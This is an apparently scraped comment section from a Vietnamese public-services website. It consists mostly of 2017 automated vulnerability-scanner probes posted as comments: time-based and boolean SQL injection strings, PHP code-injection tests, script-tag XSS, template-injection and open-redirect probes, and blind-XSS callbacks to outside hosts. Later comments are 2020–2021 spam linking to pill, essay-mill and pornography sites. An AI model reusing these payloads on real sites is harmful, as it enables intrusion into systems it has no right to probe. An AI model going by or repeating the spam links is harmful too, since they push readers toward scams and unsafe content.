(select(0)from(select(sleep(47)))v)/*'+(select(0)from(select(sleep(47)))v)+'"+(select(0)from(select(sleep(47)))v)+"*/

hvlcrvgk
7/6/2017 7:15:55 AM

${@print(md5(acunetix_wvs_security_test))}

sknkcrdc
7/6/2017 7:16:04 AM

1 waitfor delay '0:0:94' --

sknkcrdc
7/6/2017 7:16:10 AM

9S2ZhpID'; waitfor delay '0:0:94' --

hvlcrvgk
7/6/2017 7:16:12 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:16:17 AM

8CxOWHfm'); waitfor delay '0:0:94' --

sknkcrdc
7/6/2017 7:16:20 AM

IfUrdMNF')); waitfor delay '0:0:94' --

sknkcrdc
7/6/2017 7:16:29 AM

vnyQmant';select pg_sleep(94); --

sknkcrdc
7/6/2017 7:16:34 AM

LXXFiFX9');select pg_sleep(94); --

sknkcrdc
7/6/2017 7:16:38 AM

oyX9g3mt'));select pg_sleep(141); --

hvlcrvgk
7/6/2017 7:18:16 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:18:25 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:18:28 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:18:47 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:18:49 AM

${@print(md5(acunetix_wvs_security_test))}\

hvlcrvgk
7/6/2017 7:21:01 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:21:04 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:21:12 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:21:16 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:21:24 AM

${@print(md5(acunetix_wvs_security_test))}\

hvlcrvgk
7/6/2017 7:22:39 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:22:47 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:22:50 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:22:54 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:22:56 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:23:26 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:23:29 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:23:35 AM

-1 OR 2+834-834-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:23:39 AM

-1 OR 3+834-834-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:23:50 AM

-1 OR 3*2<(0+5+834-834) --

sknkcrdc
7/6/2017 7:23:58 AM

-1 OR 3*2>(0+5+834-834) --

sknkcrdc
7/6/2017 7:24:03 AM

-1 OR 2+668-668-1=0+0+0+1

sknkcrdc
7/6/2017 7:24:08 AM

-1 OR 3+668-668-1=0+0+0+1

sknkcrdc
7/6/2017 7:24:17 AM

-1 OR 3*2<(0+5+668-668)

sknkcrdc
7/6/2017 7:24:26 AM

-1 OR 3*2>(0+5+668-668)

sknkcrdc
7/6/2017 7:24:31 AM

-1' OR 2+944-944-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:24:35 AM

-1' OR 3+944-944-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:24:44 AM

-1' OR 3*2<(0+5+944-944) --

hvlcrvgk
7/6/2017 7:24:47 AM

;print(md5(acunetix_wvs_security_test));

sknkcrdc
7/6/2017 7:24:49 AM

-1' OR 3*2>(0+5+944-944) --

hvlcrvgk
7/6/2017 7:25:00 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:25:05 AM

";print(md5(acunetix_wvs_security_test));$a="

sknkcrdc
7/6/2017 7:25:08 AM

-1' OR 2+250-250-1=0+0+0+1 or 'BnFfRNiQ'='

sknkcrdc
7/6/2017 7:25:13 AM

-1' OR 3+250-250-1=0+0+0+1 or 'BnFfRNiQ'='

hvlcrvgk
7/6/2017 7:25:14 AM

${@print(md5(acunetix_wvs_security_test))}

sknkcrdc
7/6/2017 7:25:16 AM

-1' OR 3*2<(0+5+250-250) or 'BnFfRNiQ'='

hvlcrvgk
7/6/2017 7:25:23 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:25:26 AM

-1' OR 3*2>(0+5+250-250) or 'BnFfRNiQ'='

sknkcrdc
7/6/2017 7:25:32 AM

-1" OR 2+702-702-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:25:43 AM

-1" OR 3+702-702-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:25:49 AM

-1" OR 3*2<(0+5+702-702) --

sknkcrdc
7/6/2017 7:25:57 AM

-1" OR 3*2>(0+5+702-702) --

sknkcrdc
7/6/2017 7:26:06 AM

if(now()=sysdate(),sleep(51),0)/*'XOR(if(now()=sysdate(),sleep(51),0))OR'"XOR(if(now()=sysdate(),sleep(51),0))OR"*/

sknkcrdc
7/6/2017 7:26:17 AM

(select(0)from(select(sleep(51)))v)/*'+(select(0)from(select(sleep(51)))v)+'"+(select(0)from(select(sleep(51)))v)+"*/

sknkcrdc
7/6/2017 7:26:20 AM

1 waitfor delay '0:0:51' --

sknkcrdc
7/6/2017 7:26:24 AM

48rrBU23'; waitfor delay '0:0:51' --

sknkcrdc
7/6/2017 7:26:36 AM

NA9w9XTA'); waitfor delay '0:0:51' --

sknkcrdc
7/6/2017 7:26:46 AM

Qp99U18s')); waitfor delay '0:0:102' --

sknkcrdc
7/6/2017 7:26:50 AM

xXacO5BE';select pg_sleep(102); --

sknkcrdc
7/6/2017 7:26:53 AM

aC8bsdSl');select pg_sleep(102); --

sknkcrdc
7/6/2017 7:26:56 AM

jXjRQYJn'));select pg_sleep(102); --

hvlcrvgk
7/6/2017 7:27:30 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:27:34 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:27:38 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:28:01 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:28:04 AM

${@print(md5(acunetix_wvs_security_test))}\

hvlcrvgk
7/6/2017 7:30:00 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:30:02 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:30:06 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:30:20 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:30:23 AM

${@print(md5(acunetix_wvs_security_test))}\

qnblgtak
7/6/2017 7:34:25 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:34:34 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:34:52 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

qnblgtak
7/6/2017 7:35:00 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:35:10 AM

-1 OR 2+955-955-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:35:19 AM

-1 OR 3+955-955-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:35:34 AM

-1 OR 3*2<(0+5+955-955) --

sknkcrdc
7/6/2017 7:35:38 AM

-1 OR 3*2>(0+5+955-955) --

sknkcrdc
7/6/2017 7:35:42 AM

-1 OR 2+978-978-1=0+0+0+1

sknkcrdc
7/6/2017 7:35:47 AM

-1 OR 3+978-978-1=0+0+0+1

qnblgtak
7/6/2017 7:35:48 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:35:55 AM

-1 OR 3*2<(0+5+978-978)

sknkcrdc
7/6/2017 7:35:59 AM

-1 OR 3*2>(0+5+978-978)

sknkcrdc
7/6/2017 7:36:03 AM

-1' OR 2+943-943-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:36:11 AM

-1' OR 3+943-943-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:36:15 AM

-1' OR 3*2<(0+5+943-943) --

sknkcrdc
7/6/2017 7:36:25 AM

-1' OR 3*2>(0+5+943-943) --

qnblgtak
7/6/2017 7:36:29 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:36:37 AM

-1' OR 2+173-173-1=0+0+0+1 or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:41 AM

-1' OR 3+173-173-1=0+0+0+1 or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:45 AM

-1' OR 3*2<(0+5+173-173) or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:50 AM

-1' OR 3*2>(0+5+173-173) or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:58 AM

-1" OR 2+553-553-1=0+0+0+1 --

qnblgtak
7/6/2017 7:37:02 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:37:05 AM

-1" OR 3+553-553-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:37:10 AM

-1" OR 3*2<(0+5+553-553) --

sknkcrdc
7/6/2017 7:37:19 AM

-1" OR 3*2>(0+5+553-553) --

sknkcrdc
7/6/2017 7:37:23 AM

if(now()=sysdate(),sleep(165),0)/*'XOR(if(now()=sysdate(),sleep(165),0))OR'"XOR(if(now()=sysdate(),sleep(165),0))OR"*/

qnblgtak
7/6/2017 7:37:28 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:37:33 AM

(select(0)from(select(sleep(165)))v)/*'+(select(0)from(select(sleep(165)))v)+'"+(select(0)from(select(sleep(165)))v)+"*/

sknkcrdc
7/6/2017 7:37:39 AM

1 waitfor delay '0:0:55' --

qnblgtak
7/6/2017 7:37:40 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:37:57 AM

2o2VgTsh'; waitfor delay '0:0:55' --

qnblgtak
7/6/2017 7:38:01 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:38:12 AM

vvI2wiok'); waitfor delay '0:0:55' --

sknkcrdc
7/6/2017 7:38:15 AM

D5svZnnw')); waitfor delay '0:0:55' --

sknkcrdc
7/6/2017 7:38:19 AM

iiD8BQ0M';select pg_sleep(55); --

sknkcrdc
7/6/2017 7:38:26 AM

HjKUP8PW');select pg_sleep(55); --

sknkcrdc
7/6/2017 7:38:30 AM

VmUL5mTi'));select pg_sleep(110); --

qnblgtak
7/6/2017 7:38:44 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cioxexug
7/6/2017 7:45:48 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:45:51 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:45:57 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:46:00 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:48:01 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:48:06 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:48:10 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:48:14 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:49:41 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:49:44 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:49:51 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:49:56 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

vxwkrngn
7/6/2017 7:50:03 AM

http://hitFlSHZmdBPu.bxss.me/

vxwkrngn
7/6/2017 7:50:43 AM

http://hit5pTZeuPV7f.bxss.me/

cioxexug
7/6/2017 7:51:13 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

vxwkrngn
7/6/2017 7:51:15 AM

http://hitoRGf1YYNPx.bxss.me/

cioxexug
7/6/2017 7:51:22 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:51:25 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:51:32 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

vxwkrngn
7/6/2017 7:51:49 AM

http://hitLJDqIHoEfA.bxss.me/

vxwkrngn
7/6/2017 7:52:13 AM

http://hitSa8zeSZUeI.bxss.me/

vxwkrngn
7/6/2017 7:52:47 AM

http://hitG0QxasbxUJ.bxss.me/

cioxexug
7/6/2017 7:52:55 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:53:01 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:53:04 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

vxwkrngn
7/6/2017 7:53:10 AM

http://hitcgb2APs7Pw.bxss.me/

cioxexug
7/6/2017 7:53:19 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

vxwkrngn
7/6/2017 7:53:33 AM

http://hitpV6SgNvG0e.bxss.me/

vxwkrngn
7/6/2017 7:53:56 AM

http://hit1lKRMS97wE.bxss.me/

btcwmamb
7/6/2017 7:54:26 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 7:54:32 AM

1'"

btcwmamb
7/6/2017 7:54:38 AM

\

btcwmamb
7/6/2017 7:54:50 AM

1����

cioxexug
7/6/2017 7:54:58 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 7:55:01 AM

@@tUfXi

btcwmamb
7/6/2017 7:55:06 AM

JyI=

btcwmamb
7/6/2017 7:55:10 AM

�'�"

btcwmamb
7/6/2017 7:55:17 AM

�''�""

cioxexug
7/6/2017 7:55:21 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

btcwmamb
7/6/2017 7:55:22 AM

(select convert(int,CHAR(65)))

cioxexug
7/6/2017 7:55:25 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:55:29 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:56:51 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:56:54 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:56:59 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:57:03 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:58:16 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:58:33 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:58:39 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

btcwmamb
7/6/2017 7:58:47 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:58:50 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

btcwmamb
7/6/2017 7:58:57 AM

1'"

btcwmamb
7/6/2017 7:59:02 AM

\

btcwmamb
7/6/2017 7:59:15 AM

1����

btcwmamb
7/6/2017 7:59:19 AM

@@5DgcX

btcwmamb
7/6/2017 7:59:33 AM

JyI=

btcwmamb
7/6/2017 7:59:51 AM

�'�"

cioxexug
7/6/2017 8:00:00 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:00:03 AM

�''�""

cioxexug
7/6/2017 8:00:05 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

btcwmamb
7/6/2017 8:00:07 AM

(select convert(int,CHAR(65)))

cioxexug
7/6/2017 8:00:11 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 8:00:16 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

lytyjthb
7/6/2017 8:02:30 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

btcwmamb
7/6/2017 8:03:00 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:03:04 AM

1'"

lytyjthb
7/6/2017 8:03:08 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

btcwmamb
7/6/2017 8:03:09 AM

\

btcwmamb
7/6/2017 8:03:13 AM

1����

btcwmamb
7/6/2017 8:03:17 AM

@@TDu1U

btcwmamb
7/6/2017 8:03:20 AM

JyI=

btcwmamb
7/6/2017 8:03:28 AM

�'�"

btcwmamb
7/6/2017 8:03:37 AM

�''�""

btcwmamb
7/6/2017 8:03:41 AM

(select convert(int,CHAR(65)))

lytyjthb
7/6/2017 8:03:55 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:04:13 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:04:49 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:05:05 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:05:32 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:05:54 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:06:07 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

btcwmamb
7/6/2017 8:06:20 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:06:27 AM

1'"

btcwmamb
7/6/2017 8:06:31 AM

\

btcwmamb
7/6/2017 8:06:36 AM

1����

btcwmamb
7/6/2017 8:06:40 AM

@@SwBTH

btcwmamb
7/6/2017 8:06:50 AM

JyI=

btcwmamb
7/6/2017 8:06:53 AM

�'�"

btcwmamb
7/6/2017 8:07:02 AM

�''�""

btcwmamb
7/6/2017 8:07:05 AM

(select convert(int,CHAR(65)))

joansmlt
7/6/2017 8:07:10 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:07:13 AM

919814

joansmlt
7/6/2017 8:07:18 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:07:22 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:07:26 AM

/\www.vulnweb.com

joansmlt
7/6/2017 8:08:17 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:08:21 AM

995355

joansmlt
7/6/2017 8:08:29 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:08:33 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:08:47 AM

/\www.vulnweb.com

cigqotqs
7/6/2017 8:09:21 AM

'"

joansmlt
7/6/2017 8:09:43 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:09:47 AM

940042

joansmlt
7/6/2017 8:09:51 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:10:01 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:10:06 AM

/\www.vulnweb.com

cigqotqs
7/6/2017 8:10:22 AM

'"

btcwmamb
7/6/2017 8:10:57 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cigqotqs
7/6/2017 8:11:08 AM

'"

btcwmamb
7/6/2017 8:11:10 AM

1'"

btcwmamb
7/6/2017 8:11:14 AM

\

joansmlt
7/6/2017 8:11:26 AM

/www.vulnweb.com

btcwmamb
7/6/2017 8:11:28 AM

1����

joansmlt
7/6/2017 8:11:30 AM

952658

btcwmamb
7/6/2017 8:11:33 AM

@@YYSdW

joansmlt
7/6/2017 8:11:36 AM

http://www.vulnweb.com

btcwmamb
7/6/2017 8:11:39 AM

JyI=

joansmlt
7/6/2017 8:11:40 AM

//www.vulnweb.com

btcwmamb
7/6/2017 8:11:43 AM

�'�"

joansmlt
7/6/2017 8:11:44 AM

/\www.vulnweb.com

btcwmamb
7/6/2017 8:11:47 AM

�''�""

btcwmamb
7/6/2017 8:11:51 AM

(select convert(int,CHAR(65)))

cigqotqs
7/6/2017 8:12:00 AM

'"

cigqotqs
7/6/2017 8:12:41 AM

'"

joansmlt
7/6/2017 8:13:01 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:13:06 AM

909072

cigqotqs
7/6/2017 8:13:14 AM

'"

joansmlt
7/6/2017 8:13:15 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:13:19 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:13:24 AM

/\www.vulnweb.com

cigqotqs
7/6/2017 8:14:09 AM

'"

btcwmamb
7/6/2017 8:14:09 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:14:14 AM

1'"

joansmlt
7/6/2017 8:14:18 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:14:26 AM

933120

btcwmamb
7/6/2017 8:14:28 AM

\

joansmlt
7/6/2017 8:14:29 AM

http://www.vulnweb.com

btcwmamb
7/6/2017 8:14:32 AM

1����

joansmlt
7/6/2017 8:14:33 AM

//www.vulnweb.com

btcwmamb
7/6/2017 8:14:36 AM

@@RbGsT

cigqotqs
7/6/2017 8:14:40 AM

'"

btcwmamb
7/6/2017 8:14:44 AM

JyI=

joansmlt
7/6/2017 8:14:45 AM

/\www.vulnweb.com

btcwmamb
7/6/2017 8:14:49 AM

�'�"

btcwmamb
7/6/2017 8:14:54 AM

�''�""

btcwmamb
7/6/2017 8:14:59 AM

(select convert(int,CHAR(65)))

cigqotqs
7/6/2017 8:15:27 AM

'"

joansmlt
7/6/2017 8:15:47 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:15:52 AM

980828

joansmlt
7/6/2017 8:15:57 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:16:02 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:16:15 AM

/\www.vulnweb.com

joansmlt
7/6/2017 8:17:13 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:17:24 AM

942172

btcwmamb
7/6/2017 8:17:28 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

joansmlt
7/6/2017 8:17:32 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:17:41 AM

//www.vulnweb.com

btcwmamb
7/6/2017 8:17:45 AM

1'"

joansmlt
7/6/2017 8:17:48 AM

/\www.vulnweb.com

btcwmamb
7/6/2017 8:17:50 AM

\

btcwmamb
7/6/2017 8:18:07 AM

1����

btcwmamb
7/6/2017 8:18:19 AM

@@HpeHf

btcwmamb
7/6/2017 8:18:24 AM

JyI=

btcwmamb
7/6/2017 8:18:34 AM

�'�"

btcwmamb
7/6/2017 8:18:38 AM

�''�""

btcwmamb
7/6/2017 8:18:42 AM

(select convert(int,CHAR(65)))

joansmlt
7/6/2017 8:19:16 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:19:20 AM

937810

joansmlt
7/6/2017 8:19:23 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:19:27 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:19:33 AM

/\www.vulnweb.com

fxaqdbfb
7/6/2017 8:21:18 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n_9149

fxaqdbfb
7/6/2017 8:21:30 AM

acu1684<s1﹥s2ʺs3ʹuca1684

fxaqdbfb
7/6/2017 8:21:39 AM

acux3143��z1��z2a�bcxuca3143

fxaqdbfb
7/6/2017 8:21:47 AM

CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

btcwmamb
7/6/2017 8:21:55 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

fxaqdbfb
7/6/2017 8:22:02 AM

{{9999076*9999951}}

btcwmamb
7/6/2017 8:22:06 AM

1'"

btcwmamb
7/6/2017 8:22:11 AM

\

btcwmamb
7/6/2017 8:22:15 AM

1����

btcwmamb
7/6/2017 8:22:20 AM

@@tAEBm

btcwmamb
7/6/2017 8:22:25 AM

JyI=

btcwmamb
7/6/2017 8:22:29 AM

�'�"

btcwmamb
7/6/2017 8:22:34 AM

�''�""

btcwmamb
7/6/2017 8:22:37 AM

(select convert(int,CHAR(65)))

fxaqdbfb
7/6/2017 8:23:23 AM

%25%32%36%25%32%33%32%32%31%3B%25%32%30%6B%69%25%65%31%25%62%61%25%62%66%6E%25%32%30%63%25%65%31%25%62%62%25%61%37%61%25%32%30%62%25%65%31%25%62%61%25%61%31%6E%3C%53%63%52%69%50%74%20%3E%6A%74%6D%50%289806%29%3C%2F%73%43%72%69%70%54%3E

fxaqdbfb
7/6/2017 8:23:29 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n<ScRiPt>jtmP(9425)</sCripT>

fxaqdbfb
7/6/2017 8:23:38 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n<%div style=width:expression(jtmP(9427))>

btcwmamb
7/6/2017 8:24:56 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:25:01 AM

1'"

btcwmamb
7/6/2017 8:25:12 AM

\

btcwmamb
7/6/2017 8:25:17 AM

1����

btcwmamb
7/6/2017 8:25:25 AM

@@DnffB

btcwmamb
7/6/2017 8:25:33 AM

JyI=

btcwmamb
7/6/2017 8:25:39 AM

�'�"

btcwmamb
7/6/2017 8:25:43 AM

�''�""

btcwmamb
7/6/2017 8:25:52 AM

(select convert(int,CHAR(65)))

Inae3
10/8/2020 9:20:30 PM

ktO0NB http://pills2sale.com/ cheap viagra

gL7xH4
10/18/2020 8:31:25 PM

Kult0T http://pills2sale.com/ levitra nizagara

8b36ze
12/4/2020 7:53:31 AM

iSlYIw https://www.quora.com/What-the-top-SEO-keywords-for-essay-you-know/answer/Alan-Smith-1772 write my essay

cejJfh
12/12/2020 7:42:34 AM

6z6j6M http://pills2sale.com/fTr1bYnau88IsQx

nlr1Ac
12/13/2020 6:28:40 AM

7EOWZZ http://xnxx.in.net/ xnxx videos

ZYVSum
12/13/2020 11:35:21 AM

DHutZR https://writemyessayforme.web.fc2.com/

ReuTz4
12/15/2020 12:34:44 PM

HvtZfF https://writemyessayforme.web.fc2.com/#writemyessay

sDF4d
12/23/2020 8:05:30 AM

I can't get a dialling tone

ep82Z2
12/23/2020 8:06:26 AM

I've got a part-time job

KCxoVx
1/9/2021 7:11:25 PM

8uAQqd https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html

Scsz4
1/9/2021 11:31:59 PM

lpv5lu http://waldorfdollshop.us/ waldorf doll

SgADWL
6/29/2021 10:13:14 AM

VPmbRR https://xnxxx.web.fc2.com/ xnxx

ngyV6
7/23/2021 4:19:16 AM

write my essays writemyessayforme.web.fc2.com

4Q2UAh
8/3/2021 8:21:18 PM

https://beeg.x.fc2.com/sitemap1.html https://beeg.x.fc2.com/sitemap2.html https://xnxxx.web.fc2.com/sitemap1.html https://xnxxx.web.fc2.com/sitemap2.html https://xvideoss.web.fc2.com/sitemap1.html https://xvideoss.web.fc2.com/sitemap2.html

ks3jud
8/3/2021 8:28:46 PM

https://xvideoss.web.fc2.com/

Dịch vụ công trực tuyến mức độ 3tra cuu tinh trang su ly ho so Hệ thống một cửaEofficeso nghanh dia phuong Tra cuu tthcTra cuu van ban Tra cuu đo 3 Tra cuu hs mot cua Nộp trực tuyếnÝ kiến công dân
Tin nổi bật
THĂM DÒ Ý KIẾNVideo

10/26/2021 5:07:19 AM

 
Thiết kế website    
^ Về đầu trang